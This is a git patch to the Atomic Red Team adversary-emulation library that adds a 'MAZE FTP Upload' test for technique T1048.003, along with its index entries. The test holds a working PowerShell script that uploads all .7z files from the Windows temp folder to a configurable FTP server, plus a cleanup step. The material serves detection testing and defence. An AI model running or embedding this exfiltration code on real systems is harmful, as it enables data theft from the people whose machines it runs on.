From 086eb73ee8b3e9996451b55cdd5f2f1976306eba Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Tue, 17 May 2022 16:51:43 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 42 +++++++++++++
 atomics/T1048.003/T1048.003.md                | 59 +++++++++++++++++++
 6 files changed, 105 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f931669b..f2503b01 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1246,6 +1246,7 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
 exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 initial-access,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 23313f43..307e3d7a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -875,6 +875,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
 exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7dd07fed..3bc982fd 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1994,6 +1994,7 @@
   - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
+  - Atomic Test #6: MAZE FTP Upload [windows]
 - [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
   - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 4db66456..5279ffba 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1379,6 +1379,7 @@
   - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
+  - Atomic Test #6: MAZE FTP Upload [windows]
 - [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
   - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 98fdb7fc..e73fe9f2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -79344,6 +79344,48 @@ exfiltration:
           description: SMTP server to use for email transportation
           type: String
           default: 127.0.0.1
+    - name: MAZE FTP Upload
+      auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
+      description: "This test simulates MAZE's ransomware's ability to exfiltrate
+        data via FTP.\nUpon successful execution, all 7z files within the %windir%\\temp
+        directory will be uploaded to a remote FTP server. \nReference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        ftp_server:
+          description: FTP Server address
+          type: String
+          default: 127.0.0.1
+        username:
+          description: Username for FTP server login
+          type: String
+          default: 
+        password:
+          description: Password for FTP server login
+          type: String
+          default: 
+      executor:
+        command: |
+          $Dir_to_copy = "$env:windir\temp"
+          $ftp = "ftp://#{ftp_server}/"
+          $web_client = New-Object System.Net.WebClient
+          $web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+          if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+          {foreach($file in (dir $Dir_to_copy "*.7z"))
+          {echo "Uploading $file..."
+          $uri = New-Object System.Uri($ftp+$file.name)
+          $web_client.UploadFile($uri, $file.FullName)}}
+          else
+          {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+        cleanup_command: |
+          $ftp = "ftp://#{ftp_server}/"
+          try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+          {$uri = New-Object System.Uri($ftp+$file.name)
+           $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+           $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+           $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+           $ftp_del.GetResponse()}} catch{}
+        name: powershell
   T1567:
     technique:
       object_marking_refs:
diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md
index db4db939..8f7f038d 100644
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -16,6 +16,8 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
 
 - [Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP](#atomic-test-5---exfiltration-over-alternative-protocol---smtp)
 
+- [Atomic Test #6 - MAZE FTP Upload](#atomic-test-6---maze-ftp-upload)
+
 
 <br/>
 
@@ -197,4 +199,61 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - MAZE FTP Upload
+This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
+Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. 
+Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 57799bc2-ad1e-4130-a793-fb0c385130ba
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ftp_server | FTP Server address | String | 127.0.0.1|
+| username | Username for FTP server login | String | |
+| password | Password for FTP server login | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$Dir_to_copy = "$env:windir\temp"
+$ftp = "ftp://#{ftp_server}/"
+$web_client = New-Object System.Net.WebClient
+$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+{foreach($file in (dir $Dir_to_copy "*.7z"))
+{echo "Uploading $file..."
+$uri = New-Object System.Uri($ftp+$file.name)
+$web_client.UploadFile($uri, $file.FullName)}}
+else
+{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+```
+
+#### Cleanup Commands:
+```powershell
+$ftp = "ftp://#{ftp_server}/"
+try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+{$uri = New-Object System.Uri($ftp+$file.name)
+ $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+ $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+ $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+ $ftp_del.GetResponse()}} catch{}
+```
+
+
+
+
+
 <br/>